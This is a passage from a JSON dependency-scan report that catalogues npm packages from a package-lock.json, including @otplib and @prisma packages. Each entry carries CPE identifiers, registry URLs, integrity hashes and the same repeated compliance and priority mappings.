assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aa5d016d75962c38", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @otplib/plugin-crypto 12.0.1", "title": "@otplib/plugin-crypto 12.0.1", "description": "Package discovered: @otplib/plugin-crypto 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f17e31d5db2de66e", "name": "@otplib/plugin-crypto", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40otplib/plugin-crypto@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz", "integrity": "sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==", "dependencies": { "@otplib/core": "^12.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "58e5f41c022201bb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @otplib/plugin-thirty-two 12.0.1", "title": "@otplib/plugin-thirty-two 12.0.1", "description": "Package discovered: @otplib/plugin-thirty-two 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "104b985242c58dc2", "name": "@otplib/plugin-thirty-two", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40otplib/plugin-thirty-two@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz", "integrity": "sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==", "dependencies": { "@otplib/core": "^12.0.1", "thirty-two": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "de3f341e44725439", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @otplib/preset-default 12.0.1", "title": "@otplib/preset-default 12.0.1", "description": "Package discovered: @otplib/preset-default 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "05997a7e636d9fd8", "name": "@otplib/preset-default", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40otplib/preset-default@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz", "integrity": "sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==", "dependencies": { "@otplib/core": "^12.0.1", "@otplib/plugin-crypto": "^12.0.1", "@otplib/plugin-thirty-two": "^12.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "61834b2dc1830a08", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @otplib/preset-v11 12.0.1", "title": "@otplib/preset-v11 12.0.1", "description": "Package discovered: @otplib/preset-v11 12.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "59bf565b491e939f", "name": "@otplib/preset-v11", "version": "12.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40otplib/preset-v11@12.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz", "integrity": "sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==", "dependencies": { "@otplib/core": "^12.0.1", "@otplib/plugin-crypto": "^12.0.1", "@otplib/plugin-thirty-two": "^12.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "242a3037b85d7c4e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @pkgjs/parseargs 0.11.0", "title": "@pkgjs/parseargs 0.11.0", "description": "Package discovered: @pkgjs/parseargs 0.11.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "060c7b7a8f614664", "name": "@pkgjs/parseargs", "version": "0.11.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@pkgjs\\/parseargs:\\@pkgjs\\/parseargs:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40pkgjs/parseargs@0.11.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "83a6bc7b54c525e8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/client 5.22.0", "title": "@prisma/client 5.22.0", "description": "Package discovered: @prisma/client 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c440900ad881e975", "name": "@prisma/client", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/client:\\@prisma\\/client:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/client@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz", "integrity": "sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "888b8378fb32621d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/debug 5.22.0", "title": "@prisma/debug 5.22.0", "description": "Package discovered: @prisma/debug 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9f4e1fa5bdb80e5a", "name": "@prisma/debug", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/debug:\\@prisma\\/debug:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/debug@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz", "integrity": "sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1e736006ff85bb23", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/engines 5.22.0", "title": "@prisma/engines 5.22.0", "description": "Package discovered: @prisma/engines 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0f98eed7c2a9484e", "name": "@prisma/engines", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/engines@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz", "integrity": "sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA==", "dependencies": { "@prisma/debug": "5.22.0", "@prisma/engines-version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/fetch-engine": "5.22.0", "@prisma/get-platform": "5.22.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c3ee871894c65f6a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "title": "@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "description": "Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3a15a4d5b57a6a32", "name": "@prisma/engines-version", "version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 